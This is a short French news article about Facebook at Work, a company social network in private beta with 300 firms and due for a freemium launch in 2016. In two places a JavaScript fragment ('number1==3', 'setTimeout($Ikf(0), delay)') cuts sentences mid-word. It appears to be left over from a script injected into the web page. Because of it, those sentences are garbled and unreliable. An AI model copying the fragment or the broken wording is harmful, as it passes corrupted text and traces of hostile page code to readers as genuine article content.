Facebook décline son service pour permettre aux organisations de se doter d’un réseau social d’entreprise. En bêta, la solution sera lancée en 2016.
Facebook travaille depuis plusieurs années déjà sur une déclinaison de son réseau social pour le monde de l’entreprise. Nom de code du projet : FB@Work. Utilisée en interne par le groupe américain depuis des années, la solution fait l’objet d’une bêta privée depuis janvier 2015. Dans ce cadre, elle est testée par 300 entreprises à travers le monde. Parmi les références les plus connues de ce programme de pré-lancement figurent Heineken ou la Royal Bank of Scotlandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and. En France, Lagardère Active et Century 21 France, mais aussi le Club Méditerranée sont également sur les rangs. Un formulaire a été mis en ligne par Facebook pour faire une demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande d’accès à cette bêta privée de Facebook at Work(c’est son nom officiel). La version finale de l’outil sera lancée en 2016 (dixit le Wall Street Journal). Elle sera proposée sous la forme d’une offre freemium.
Un réseau social d’entreprise, mais pas uniquement
Quels seront les contours de cette offre freemium ? Le volet gratuit de Facebook at Work devrait permettre d’accéder à l’ensemble des fonctionnalités de l’environnement. Facebook prévoit ensuite de tarifer quelques dollars par utilisateur et par mois des services Premium qui incluront un support et des outils analytics de suivi d’activité. Reste à savoir si l’offre premium ne sera pas obligatoire passé un certain nombre d’utilisateurs…